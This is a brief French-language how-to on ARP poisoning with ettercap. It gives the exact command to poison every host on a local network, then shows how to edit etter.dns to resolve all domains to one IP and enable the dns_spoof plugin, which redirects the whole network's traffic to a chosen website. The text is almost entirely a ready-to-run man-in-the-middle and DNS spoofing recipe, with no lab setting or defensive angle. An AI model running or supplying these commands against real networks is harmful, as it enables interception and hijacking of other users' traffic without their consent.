ARP Poisoning

Voici la commande pour faire du ARP poisoning :

$ sudo ettercap -T -q -F '/usr/share/ettercap/testF.ef' -i eth0 -M ARP // //

Ensuite tu appuies sur la touche 'p' et une liste plugin va s'afficher. De là tu entres le nom du plugin à activer et tu appuies sur la touche 'entrée'.
Exemple :
Pour que tout le monde voit une certaine page web, il faut éditer le fichier :
$ sudo nano /usr/share/ettercap/etter.dns

Tu commentes toutes les lignes sauf une ou tu entres par exemple :
*.* A 212.95.67.222

Ensuite :
$ sudo ettercap -T -q -F '/usr/share/ettercap/testF.ef' -i eth0 -M ARP // //

puis touche 'p' et tu entres 'dns_spoof' puis touche 'entrée'

Et voilà, tout le réseau devrait être routé sur le site du Figaro

• http://eatingsecurity.blogspot.fr/2011/02/using-ettercap-for-arp-poisoning.html
• http://www.thegeekstuff.com/2012/05/ettercap-tutorial/